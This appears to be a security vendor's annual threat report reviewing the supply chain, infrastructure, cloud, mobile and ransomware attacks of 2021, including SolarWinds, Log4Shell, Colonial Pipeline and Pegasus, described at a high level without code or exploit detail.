The infamous SolarWinds supply chain attack was revealed in December 2020, but its influence on the cloud attack landscape, with particular regard to supply chain attacks, has led to its inclusion in our report once again. The SolarWinds incident originated with a sophisticated malware, Sunburst, incorporated into several compromised versions of an IT resource management product named SolarWinds Orion, used by 33,000 customers worldwide. The malicious update, attributed to the Russian Intelligence agency-affiliated threat group called ‘Nobelium’, found its way to around 18,000 corporations, infecting organizations such as US government departments including the Department of Homeland Security and the Treasury Department.
As detailed in our previous report, beyond its unprecedented scale, SolarWinds' main innovation lies in its technique. In order to gain access to an organization's sensitive Microsoft 365 resources, the attackers first used a forged token to compromise the local and on-premise networks, before moving laterally to the cloud environment. Today, we can clearly state that the SolarWinds attack laid the foundations for a rapid surge in supply chain attacks.
Throughout 2021, software supply chain attacks grew in both frequency and scale. Researchers concluded that software supply-chain attacks increased by no less than 650% throughout the year. A study issued by the European Union Agency for Cybersecurity (ENISA) reviewed two dozen incidents and found that 66% of supply chain attacks were committed by exploiting an unknown vulnerability, while only 16% leveraged known software flaws. Most attacks actually targeted software code. This year, It seems that organizations were once again caught largely unprepared, as a survey concluded that 82% of companies designate the third party vendors that make up their software supply chain with highly privileged roles. 76% provide roles that could allow account takeover, and, worst of all, over 90% of designated security teams were not aware that such permissions were even granted.
Naturally, prominent APT groups are an integral part of the trend. The North Korean Lazarus group recently began targeting IT service providers to launch supply chain attacks, and a new backdoor called BLINDINGCAN has already been used to target a Latvian IT vendor and a South Korean software company. Additional incidents include an attack against a CCTV vendor carried out by an affiliate of the DarkSide ransomware gang, in which the actors compromised the vendor's website to infect its clients with ransomware.
One of the most significant supply chain attacks of 2021, also featuring ransomware delivery, targeted Kaseya, a global provider of IT management software for managed service providers (MSPs) and IT teams. The attack was carried out by a member of the affiliates program of the REvil ransomware group. According to the Kaseya CEO, less than 0.1% of the company's customers were accessed, but as some of Kaseya's clients are MSPs themselves, as many as 1,500 companies were affected by the attack. The threat actors cleverly exploited a vulnerability affecting Kaseya's internet-facing VSA servers. VSA is a remote-monitoring tool commonly used by MSPs for the management of network and endpoint devices. When the attack was discovered by Kaseya, the company urged its customers to shut down their VSA servers
In late October, the popular NPM package 'ua-parser-js', with millions of weekly downloads, was compromised by attackers. For a period of four hours, the actors managed to take over the developer's NPM account and inserted malicious code into three versions of the NPM library. The library, which is used to parse user agent strings and identify its browser, operating system, CPU and more, is used in thousands of projects, including ones owned by Facebook, Microsoft, Amazon, Google and Slack. Therefore, the supply chain attack, in which compromised packages of the library were distributed instead of the legitimate one, enabled threat actors to install malware on a large number of infected devices. In this case, Linux and Windows devices were infected with crypto-miners and password-stealers.
Another prominent incident took place in November, when multiple Greek shipping companies were hit by ransomware. This was after a common IT service provider, Danaos Management Consultants, was compromised in a supply chain attack. The incident crippled the shipping companies' communication channels, interrupting contact with other ships, suppliers, and agents, and also led to data loss.
This year, the group behind the SolarWinds attack itself resumed activity, utilizing the approach developed for the first attack and focusing yet again on companies that are part of the global IT supply chain. However, this time, a different part of the chain is being targeted , namely cloud resellers and tech service providers. These companies customize, implement, and manage cloud services for their customers. The threat group clearly relies on these companies' direct access to their clients' environments to obtain access to their full client lists in a single strike, impersonating a trusted partner. The operation has been taking place since May 2021 and has already impacted more than 140 resellers and providers, compromising 14 of them.. Throughout the second half of the year, the 'Nobelium' threat group has been highly active, but with a lower success rate due to growing awareness. The group utilizes multiple tactics, including the use of stolen credentials obtained via an info-stealer campaign by a third-party actor, leveraging application impersonation privileges to collect protected mail data, and abuse multi-factor authentication (MFA). The recent attack wave may signal a growth in the resources invested by the Russian state-sponsored group in the field of supply chain operations, as a means to establish persistent access to targets of interest to the Russian government.
Just when we thought we had finished summarizing the Supply Chain landscape for 2021, the Log4j zero-day vulnerability was exposed. The Apache logging package Log4j is the most popular Java logging library with over 400,000 daily downloads, and is incorporated into millions of Java-based applications worldwide. Companies using Log4j as a logging package include Cisco, Twitter, Cloudflare, Tesla, Amazon, Apple and more. The Log4j package logs error messages; according to the Apache Foundation advisory, an attacker who can control log messages or their parameters could execute arbitrary code from an external server via multiple protocols when message lookup substitution is enabled. Only a single string of text is needed to exploit the flaw.
Since its discovery on December 9, the ‘Log4Shell’ flaw, has been actively exploited in the wild. The vulnerability, assigned CVE-2021-44228, could allow an unauthenticated attacker to execute malicious code or take over any system that uses the vulnerable version of an open-source library. Unsurprisingly, it scored a perfect 10 out of 10 in the CVSS rating system. Due to the scale of the distribution of the library, Log4Shell is referred to as the most critical vulnerability of 2021, with the full scope of the damage yet to be determined. The Apache Foundation released a patch for the RCE vulnerability, but nevertheless, mass scanning of vulnerable servers has been observed by multiple security vendors. The exploit rate of the Log4j flaw has been unusually high since shortly after its exposure. Check Point Research detected approximately 40,000 attack attempts 2 hours after the Log4j vulnerability was revealed and 830,000 attack attempts 72 hours into the event.
The vulnerability could potentially allow threat actors to access any system using the library, including systems that are used to manage client networks and resources. The potential damage that could be caused by this one vulnerability in an open source library demonstrates the immense risk posed by software supply chains, especially in cases where an underfunded project, run by several part-time volunteers, is a key component that thousands of multi-million computer systems rely on worldwide.
It’s no secret that a cyberattack, whether targeted or widely distributed, can have a dramatic impact on organizational performance, data integrity, customer success, long-term reputation and, of course, finances. Naturally, attacks targeting critical infrastructure can paralyze an organization’s routine as well as its entire supply chain. In 2021, we witnessed an unusually high number of attacks that led to disruptions to individuals’ day-to-day lives, and in some cases even threatened their sense of physical security. Whether they are financially or ideologically driven, threat actors are constantly looking for additional leverage and new ways to increase the pressure placed on their victims.
One of this year’s most significant attacks, which perfectly demonstrates the above, is a ransomware incident that took place in May. The operation targeted the Colonial Pipeline fuel company which delivers fuel to the Southeast coast of the United States. The incident forced the company to shut down their operations, increasing gasoline prices and causing a major supply shortage on the East Coast. This chain of events eventually triggered a rush of panic buying as many gas stations completely ran out of fuel. Government officials pleaded with the public not to rush to gas stations, as people were actually attempting to fill plastic bags with gasoline to avoid running out. A single day after the attack took place, Colonial Pipeline had no choice but to pay the USD$5 million ransom to the DarkSide ransomware gang who led the attack in order to unlock their systems.
In the same month, JBS S.A, the world's largest meat processing company, fell victim to an attack by the REvil ransomware group. The Brazilian company distributes meat products made in 150 industrial plants in 15 countries, and has approximately 150,000 employees worldwide. The attack that hit the company network impacted slaughterhouses and meat supplies in the US, Canada and Australia and caused more than 3000 workers’ shifts to be canceled. All of its US beef plants and meat packing facilities, responsible for almost a quarter of American meat supplies, ceased production while The White House assigned the FBI to investigate. In Australia, some abattoirs were completely shut down, forcing the company to furlough 7,000 employees. Eventually, with the fear of price inflation combined with massive unemployment, the CEO of JBS USA, a subsidiary of JBS S.A., announced that the company paid the cybercriminals a ransom equivalent to $11 million in BTC.
The education sector was also heavily impacted. In 2021, it was the most targeted sector globally, with a 75% increase compared to 2020 and an average of almost 1, 605 attack weekly attempts per organization. The disruption suffered by educational institutions impacted students, professors and other staff members. Howard University in Washington D.C fell victim to a ransomware attack in September and was forced to suspend classes to conduct a thorough investigation of their network together with an audit of the student and staff devices. Similarly, The Lewis and Clark Community College in Illinois was hit by a ransomware attack in November that affected their online learning platform as well as other critical systems. They had to close all their campuses, and cancel extra-curricular activities including sporting events taking place in their facilities. The FBI released an alert against the PYSA ransomware that targets higher education institutions in the US and the UK. Finally, in mid-2021, the Grief ransomware attacked several school districts in the US, among them a school district in Mississippi. The ransomware stole 10GB of data including personal and professional information, and has threatened to publish the data unless it is paid. Institutions of higher learning such as universities and colleges make good targets for cyber-criminals because their systems, which allow students and faculty to connect their personal devices to the institution’s network, aren’t fully protected.
The healthcare sector has also been heavily targeted by cybercriminals since the start of the pandemic, as hospitals, research facilities involved in the development of vaccines, and pharmaceutical companies all prove tempting targets due to the time-sensitive nature of their work. In October, a devastating ransomware attack took place against the health care system of Newfoundland and Labrador, Canada. As a result, employee and patient data was stolen and key systems were taken down for more than a week, leading to a delay in thousands of appointments, including chemotherapy, as almost all non-emergency services and procedures were canceled within the province. That same month, we witnessed one of the first ransomware attacks against a hospital in the Middle East, as the Chinese group DeepBlueMagic targeted the Hillel Yaffe Medical Center in Hadera, Israel, with a custom ransomware. The attack incapacitated computers and some of the hospital infrastructure, making discharging and processing patients impossible due to the inability to retrieve patient files and register new ones. In December, the Behavioral Health Group (BHG), which maintains over 80 Opioid treatment clinics throughout the US, suffered a cyber-attack that disrupted its network for a week. In some centers, patients were prevented from getting their prescribed take-home dosage of medicine to treat narcotic addiction as the computers were not available to print prescription labels, potentially harming their sensitive anti-addiction treatment.
Ideologically driven hackers also managed to cause public disruption , particularly in Iran. First, the Iranian railways infrastructure faced a cyber attack back in July in which hackers displayed messages about train delays or cancellations on information boards at stations across the country, urging passengers to call a number (which belonged to the Iranian Supreme Leader Ayatollah Khamenei’s office) for more information. The attack severely disrupted train operations the same day and spread fear and confusion among the public. Check Point Research investigated and attributed the attack to the Indra group which opposes the regime and has been active since at least 2019, known for its use of wiper malware.
In October, a massive cyber-attack disrupted 4,300 Iranian gas stations, targeting the electronic cards system which allows people to buy gas with government subsidies. On the screen, consumers who tried to fill their tank found the notice “cyberattack 64411”, Iran’s Supreme Leader’s phone number (the same on exposed in the train attack). The incident caused a great deal of disorder with long lines of people at gas stations fearing shortages and sudden price increases.
All of the attacks described above had a substantial impact on a particular target sector and region. They also gained a lot of media attention, which naturally plays right into the hands of cybercriminals in their attempts to plant fear and gain leverage over their victims. Unfortunately, as 2021 has demonstrated, cyber attacks often have a much wider effect on the general population than the original attacks may have even intended.
In 2020, the global pandemic brought significant changes to the corporate work environment as well as corporate network architecture. Within those changes, both the shift to cloud-based architecture – meant to address the need for hybrid, remotelymanaged networks – and the preference for as-a-service providers over traditional suppliers, have really stood out in terms of the scale of their adoption. Subsequently, in 2021, it became clear that cloud environments were also growing in popularity among end users. By mid-year, Gartner had released its forecast stating that end-user spending on public cloud services was estimated to grow by 23% in 2021 to over US$ 332 billion, compared to US$ 270 billion in 2020 and US$ 242.7 billion in 2019. Enterprises are now allocating large-scale funds to multi-cloud architectures, with Microsoft Azure and AWS leading in popularity, and Google Cloud Platform, IBM, VMWare and others dominating a respectable share of the market.
Naturally, organizations are becoming increasingly dependent on cloud vendors to securely manage their databases, proprietary code, and organizational resources. These organizations are now gradually filling in the platform and role management knowledge gaps formed during the rapid shift to cloud-based environments during 2020, leading to better security and more comprehensive administration. IAM (Identity and Access Management) Role Assumption attacks, aimed at elevating privileges after obtaining unauthorized access, however, continue to be a significant concern.
As usual, threat actors continue to race against the security research community, looking for new vulnerabilities and exploits. Since late 2021, we have witnessed a wave of attacks leveraging flaws in the services of industry-leading cloud service providers to gain control over an organization’s cloud infrastructure, or, potentially, the organization’s entire database which stores proprietary, customer and financial information. The flaws under discussion are not trust logic flaws – permission-based flaws that derive from the organization’s role policy that are used by threat actors to gradually escalate privileges within the environment. Instead, we’re dealing with critical vulnerabilities in the cloud infrastructure itself, which can allow full takeover of accounts or arbitrary code execution.
The trend is led by the infamous OMIGOD flaw attacks. In September, researchers found four critical vulnerabilities in OMI (Open Management Infrastructure), one of Microsoft Azure’s software agents that allows users to manage configurations across remote and local environments. OMI is deployed on Azure Linux VMs embedded into multiple Azure services and is deployed automatically when some services are enabled – which makes these flaws highly likely to be exploited. An estimated 65% of all Azure customers are vulnerable, which translates to thousands of organizations and millions of end-point devices. OMIGOD flaws are easy to exploit, as only a single request with the authentication header removed, is needed. Together, the vulnerabilities could enable actors to execute remote arbitrary code within a vulnerable network and escalate to root privileges.
Microsoft already issued a patch to address the flaws as part of their September 2021 release. However, some researchers warned that the company’s automatic fix was ineffective for several days, until it was repaired. Attacks leveraging these flaws, in particular the 9.8-rated RCE flaw, assigned CVE-2021-38647, have already been observed as of the time of exposure and have increased rapidly ever since. Servers scanning for vulnerable devices spiked from around 10 to more than 100 during the first weekend alone. The notorious Mirai IoT (Internet-of-Things) botnet was one of the first to target vulnerable devices, and the malware attempted to close port 5896 (the OMI SSL port) to keep other actors from taking advantage of the attack. Attacks aiming to deploy crypto miners onto unpatched Linux devices were also observed
Another alarming flaw in Microsoft Azure was exposed a month earlier, in August. This time, the vulnerability, dubbed ‘ChaosDB’, was found in Azure Cosmos DB, a multi-model NoSQL database used by some of the top global businesses out there, such as Coca Cola, Skype, and Symantec, to manage large-scale databases including financial transaction information. The flaw enables an actor to retrieve several internal keys used to obtain root privileges that eventually enable it to manage the organization’s databases and accounts. Simply put, by exploiting this flaw, attackers can gain complete and unrestricted control of the entire cloud resources of all Azure Cosmos DB clients.
Yet another breach in Microsoft Azure was discovered towards the end of the year. The flaw, called ‘Azurescape’, affects Azure’s Container-as-a-Service (CaaS) platform and relies on a two-year-old vulnerability assigned CVE-2019-5736 in RunC, a container runtime. Uniquely, Azurescape is a cross-account vulnerability: it allows an attacker to break out of the breached environment and execute code on environments belonging to other users in the same public cloud service. This means that a malicious user of the Azure Container Instances (ACI) could potentially run arbitrary code on other clients’ Kubernetes clusters. Exploitation of the flaw consists of three stages, beginning with container escape, which is a privilege escalation technique for container environments. Azurescape enables an attacker to gain administrative privileges over an entire cluster of containers. Thankfully, a patch was swiftly released when the flaw was first exposed, but further action by ACI users is also required. As of late 2021, no exploits were detected. The flaw, however, has raised awareness to the dangers posed by multi-tenant cloud environments, common large-scale infrastructures that host multiple organizations on a single platform.
Microsoft Azure is not the only service in which security flaws were discovered in the past year. In June, researchers uncovered a vulnerability in Google's Compute Engine (GCE), an infrastructure-as-a-service (IaaS) component of Google Cloud Platform which is used to create and launch virtual machines on demand. The flaw enables an attacker to take over virtual machines due to a combination of factors, including the use of weak random numbers by the ISC DHCP software. Exploitation of the flaw, achieved by impersonating the Metadata server from the targeted VM's point of view, could allow actors to eventually login as the root user of the VM. Google issued a patch for the flaw almost a year after it was first disclosed.
Recent research also provides an in-depth review of a technique called HTTP header smuggling and its potential use to attack AWS’s API Gateway and AWS Cognito, an authentication provider. The research demonstrates how this technique could be leveraged to bypass restrictions and achieve cache poisoning.
Finally, in late 2021 researchers noticed a peculiar change in AWS permissions that could allow AWS support services to read a customer’s S3 bucket data, instead of just observing its metadata. This potential privacy flaw was made possible by a change to the permissions of a mandatory role called ‘AWSServiceRoleForSupport’, created to allow technical and administrative support. Eventually, the change was reverted and AWS stated that they will implement additional safeguards to prevent such misconfigurations in the future.
To conclude, in 2021 cloud provider vulnerabilities became much more alarming than they were previously. The vulnerabilities exposed throughout the year have allowed attackers, for variable length timeframes, to execute arbitrary code, escalate to root privileges, access mass amounts of private content and even cross between different environments. In short, vulnerabilities in the cloud infrastructure itself have been exposed, that even the most vigilant and professional cloud consumer could not have foreseen or prevented.
Throughout 2021, threat actors gradually increased their focus on mobile devices, for both large-scale end user campaigns and targeted enterprise attacks. A survey-based study revealed that implementation of the ‘BYOD’ (Bring-Your-Own-Device) policy in the workplace, in which employees replace designated corporate devices with their own personal devices, caught organizations unprepared, with approximately 49% of surveyed organizations indicating that they are unable to detect an attack or incident on employee-owned devices.
We must first address the developments around NSO’s Pegasus, one of the most notorious mobile malware families . Pegasus is a mobile spyware capable of infecting both iOS and Android devices, and was developed and marketed by the Israel-based NSO Group. The spyware can gain full control of a mobile device and harvest a multitude of data types such as messages, photos, calendars, emails and more. Additionally, the malware is capable of activating the camera, collecting images, as well as recording surrounding conversations. Pegasus’ infection is based on an elaborated zero-click exploit . Though the malware was first discovered in 2016, in 2019 it was revealed that the spyware leveraged the WhatsApp service to infect over 1,400 users, the targets of multiple NSO customers.
In July 2021, a vast collection of news outlets reported that the tool had been used to gain access to mobile devices of government officials, journalists, human rights activists and business executives worldwide. A list containing around 50,000 potential Pegasus victims was leaked and made headlines, possibly shedding light on NSO’s customers. The media attention led to extensive research in an effort to uncover Pegasus’ infection methods and help users detect Pegasus on their devices. Eventually, in September, Apple issued patches for two zero-day vulnerabilities in iMessage leveraged by Pegasus, assigned CVE-2021-30860 and CVE-2021-30858. These flaws exploit iPhones and Macs by allowing malicious documents to execute commands. In November, Apple filed a suit against NSO for using their hacking software on Apple devices and stealing private data. Naturally, the threat actors quickly tailored an extortion scam based on the scandal. A recent campaign leverages the public fear of Pegasus iOS spyware, seeking to intimidate potential victims by spreading emails containing ransom demands and claiming to have private videos of the victims, allegedly taken by the Pegasus malware.
Pegasus stands out due to its seamless, zero-click infection process, controversial victim list and sophisticated data exfiltration features. It is therefore not surprising that it is no longer the only one of its kind. Toward the end of the year, researchers exposed an additional threat actor in the private sector mobile spyware arena. Cytrox, a company based in North Macedonia, markets a spyware called Predator for iPhone devices, which infects the customer’s targets via single-click links sent over WhatsApp. As more and more information about the malware capabilities is exposed, the greater the chance that these will be adopted by common threat actors and groups. In addition, the wide distribution of mobile spyware and the attention this field has attracted in 2021 are yet further indications of the crucial role mobile devices play in the cyber threat landscape.
Throughout the year, we observed threat actors investing substantial efforts in hacking top social media accounts such as Facebook and Telegram. These efforts included the execution of large-scale attack campaigns aimed at obtaining access to mobile devices. In August, a new Android Trojan called ‘FlyTrap’ was found to have compromised at least 10,000 Facebook accounts across 144 counties since March 2021, predominantly through malicious applications available on the Google Play Store. The applications were uploaded and quickly removed from the platform but were later available on third-party app stores. Attackers also leveraged WhatsApp to distribute a modified version of the app for Android devices that installs the “Triada” Trojan. In October, researchers found a photo editing application offered on the Google Play Store which contained a malicious code that collected users’ Facebook credentials and used them to run ad campaigns with the victim’s payment information. The app was downloaded by thousands of users. Finally, in November, a new Android malware called ‘MasterFred’ rose to prominence due to its use of fake login overlays to steal credit card information from Netflix, Instagram and Twitter users
Another significant attack vector that was prominent in 2021 relies on SMS messages for malware distribution. SMiShing, short for SMS phishing, is a phishing technique that relies on mobile devices for social engineering distribution, and uses SMS messages as the attack vector. The FluBot Android botnet, which relies on this technique, resumed its activities in April 2021 despite designated arrests by the Spanish police. In September, the botnet added to its arsenal a new method to compromise Android devices, and began spreading a fake security update message, warning of a FluBot infection. The infection is triggered once the victim clicks on the ‘install security update’ button. FluBot appeared again in November in a campaign targeting Finnish users. After the attack vector demonstrated its efficiency in FluBot’s campaigns, SMiShing has been gradually adopted by low-skilled actors. For example, a recent investigation conducted by Check Point Research indicated that SMiShing attacks are very effective in Iran, despite the general low quality of the actors’ toolsets. These campaigns utilize SMiShing while also impersonating key entities such as the Iranian government, the judiciary system, shopping portals and more. Many warnings about this now thriving attack method appeared in news outlets. The scale of the recent attack wave is unprecedented, which comes as no surprise if you inspect the flourishing botnet-as-a-service market taking place in underground forums and Telegram channels. Phishing kits are available for prices ranging from USD$ 50 - US$ 100. We estimate that similar campaigns, also inspired by FluBot’s successful use of SMiShing, might soon appear in other countries as well.
Another extensive scam that took place in 2021 revolving around SMS messages is ‘UltimaSMS’, a massive campaign that utilizes around 150 Android applications. With more than 10 million downloads from the Google Play Store, its trick is to lure victims into subscribing to premium SMS services without their knowledge.
Finally, systematic changes caused by the global pandemic are also affecting the mobile banking malware arena. The expanding digitization of the banking sector in 2021 led to the surfacing of various applications designed to limit offline interactions, which in turn have led to the distribution of new threats. In September, Check Point Research uncovered a new attack method against Android users that abuses the device’s accessibility services. The attack targeted users of PIX, a year-old, yet extremely popular, instant payment solution created and managed by the Brazilian Central Bank. The campaign featured two variants of banking malware distributed by two malicious applications on the Google Play Store. The more unique one, called PixStealer, abused Android’s Accessibility Services (AAS) to steal money from a specific bank through PIX transactions. This minimalistic yet innovative combination of functions allows the malware to collect funds without interacting with a C&C, helping it to remain undetected. Due to its simplicity and efficiency, we can expect other threat actors to follow this lead.
Gone are the days when ransomware operators negotiated a ransom of US$200 for your family photos. Today’s ransomware economy is a complex operation extorting millions of dollars per ransom, holding entire organizations captive under the threat of total system shutdown. The evolution of the ransomware business model is at the core of this phenomenon. Ransomware-as-a-Service (RaaS) introduces affiliate programs at low onboarding costs, enabling any attacker to easily join the trend. The attacker selects one of the leading ransomware “projects” and follows the detailed, easy to follow complimentary operations manual, which contains complete instructions for every stage of the attack. If the intrusion was successful, the ransomware operators and affiliates share a percentage of the victim’s ransom payment. This extremely profitable scheme allows attackers to reach a wider range of victims and offers higher returns to all involved.
The ransomware operators are the backbone of the whole operation, offering not just the ransomware itself, but also money laundering services and negotiation specialists. The different ransomware programs compete for affiliates, so ransomware groups are constantly developing more attractive tools and services for their affiliate programs in order to help them stand out in a competitive underground community. Reputation is a key motivating factor, as that can influence a group’s chances of earning big returns or even lead to apprehension by the authorities. It’s therefore not surprising that cybercriminals mediate their internal disputes on tribunal forums, where losing a case can cost a group their reputation and profits.
This was a turbulent year for several ransomware groups, not the least because governments and law enforcement agencies changed their stance against organized threat actors. They turned from preemptive and reactive measures to proactive offensive operations targeting the ransomware operators themselves, as well as their funds and supporting infrastructure. The major shift happened following the Colonial Pipeline incident in May, where a DarkSide ransomware attack resulted in a major fuel shortage throughout the East Coast in the US, thus causing the Biden administration to realize they had to step up efforts to combat the threat.
Later that month, the DarkSide gang announced they were shutting down operations after their servers were seized and their cryptocurrency funds, which were used to pay affiliates of the Ransomware-as-a-Service program, were stolen. In June, the US Department of Justice (DOJ) upgraded ransomware to a national security threat, placing it at the same priority level as terrorism. The next major incident surrounded the Kaseya MSP platform breach in July, after which REvil perpetrators mysteriously disappeared, taking their leaks website “Happy Blog” offline and apparently shutting down their customer support. However, this shutdown was short-lived and the group resurfaced in September. Then, they disappeared again in October after a suspected law enforcement operation successfully hijacked their infrastructure and “Happy Blog”.
In September, the Biden administration took their war against ransomware a step further and announced they would begin sanctioning crypto exchanges, wallets and traders that ransomware threat actors use to convert ransom payments into tangible funds. The Russian-based SUEX exchange was the first to be added to the sanctions list for their part in ransom transactions. The next month, the European Union and an additional 31 countries announced they would join the effort to disrupt additional cryptocurrency channels, in an attempt to cripple the money laundering process. In addition, the Australian Government issued its “Ransomware Action Plan”, which includes the formation of a new special task force and harsher punishments for ransomware actors.
In November, an international joint operation led by Interpol named “Operation Cyclone”, led to infrastructure seizure and arrests of money laundering affiliates for Cl0p, the group responsible for the Accellion breach , which was the source of numerous double and triple extortions. In addition, the US DOJ and other federal agencies pursued further actions against REvil. These actions included members’ arrests, the seizure of USD$6 million worth of ransom money, confiscation of devices and a bounty program worth USD$10 million.
The reaction to these developments varied widely within the ransomware ecosystem. Some groups showed hostility and applied even more pressure on their victims to keep authorities away from their business. For example, Grief Ransomware threatened to completely delete their victims’ decryption keys should they hire professional negotiators. Similarly, RagnarLocker posted online all of the content stolen from victims that contacted the FBI or other law enforcement agencies.
Other groups appear to have concentrated on adapting and rebranding themselves to avoid being too closely associated with a prominent attack. Darkside, for example, temporarily exited the ransomware arena and at least some of its members rebranded themselves as BlackMatter in July. They carried out attacks against the marketing service provider Marketron, the Japanese tech company Olympus, and critical infrastructure such as the New Cooperative Farmers Organization in Iowa. However this rebranded operation was short lived, when in November, BlackMatter announced they were shutting down due to pressure from the authorities. They even said that their team members were “no longer available after the latest news”, yet experts believe that this exit was a result of trust issues with their affiliates due to flawed encryption, allowing a security company to decrypt victims’ files. In a final testament to underground cooperation, BlackMatter has partnered with LockBit ransomware and transferred their victims to the LockBit platform to facilitate a seamless extortion, just before vanishing.
Unfortunately, not all ransomware groups exhibited this harmonious cooperation. The fear of being apprehended by the authorities was compounded by marked distrust promoted by constant competition. For example, REvil operators were caught cheating their affiliates by hijacking the ransom negotiation process, using double chats and backdoors to cut them out of their shares. The Conti group experienced an internal crisis after one disgruntled affiliate leaked Conti’s playbook, complaining of low compensations.
Finally, this past year, we also saw signs of the ransomware community cracking under pressure or even closing shop altogether, with some operators completely abandoning their businesses. For instance, the Avaddon cybercrime gang first appeared in June 2020, but only a year later was compelled to shut down and release decryption keys, undoubtedly due to the increased scrutiny by law enforcement. In another instance, Conti ransomware targeted British Graff Jewelry, but later issued an apology after realizing that some of the stolen data belonged to the Saudi, UAE & Qatar Royal Families. Fearing retaliation, they promised to delete the data without review. Major cybercrime forums banned any ransomware advertising from their platform to avoid drawing attention. This made it more difficult for operators to effectively communicate with affiliates, adding to the risk of being caught.
Proactive measures and offensive operations by governments worldwide have managed to put a noticeable dent in the ransomware ecosystem, disrupting ransomware operations and causing havoc in the underground scene. Despite this, millions of dollars in potential revenue mean that we will likely see more ransomware “projects” coming up in 2022, with successful ones serving as a model for upcoming and improved attacks. One takeaway the ransomware operators may have from the events of 2021 is that the type of targets ransomware operators choose might be the difference between a long term operation or a very short one.
